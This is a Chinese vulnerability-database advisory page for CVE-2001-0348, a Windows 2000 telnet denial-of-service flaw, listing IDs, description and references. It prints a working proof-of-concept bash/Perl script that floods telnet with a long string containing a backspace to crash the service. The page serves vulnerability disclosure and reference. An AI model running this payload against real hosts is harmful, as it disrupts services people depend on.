Microsoft Windows 2000 telnet service拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106379 漏洞类型 未知
发布时间 2001-06-07 更新时间 2005-05-02
CVE编号 CVE-2001-0348 CNNVD-ID CNNVD-200107-158
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20907
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-158
|漏洞详情
MicrosoftWindows2000telnetservice存在漏洞。本地用户可以借助包含一个退格符的超长logon命令导致服务拒绝(崩溃)。
|漏洞EXP
source: http://www.securityfocus.com/bid/2838/info

Due to a flaw in the implementation of the telnet service, it is possible for a remote client to perform a denial of service attack against a host.

If approximately 4300 characters already exist in the input buffer and additional numerous specially chosen characters are provided, the service will stop responding. 

#!/bin/bash
  ( sleep 1
    perl -e '{printf "%s\x7f%s","A"x4500,"A"x100}'
    sleep 3
  ) | telnet victimbox
  - eof -
|参考资料

来源:MS
名称:MS01-031
链接:http://www.microsoft.com/technet/security/bulletin/MS01-031.asp
来源:XF
名称:win2k-telnet-username-dos(6666)
链接:http://xforce.iss.net/static/6666.php
来源:CIAC
名称:L-092
链接:http://www.ciac.org/ciac/bulletins/l-092.shtml
来源:BINDVIEW
名称:20010608RangecheckingfaultconditioninMicrosoftWindows2000Telnetserver
链接:http://razor.bindview.com/publish/advisories/adv_mstelnet.html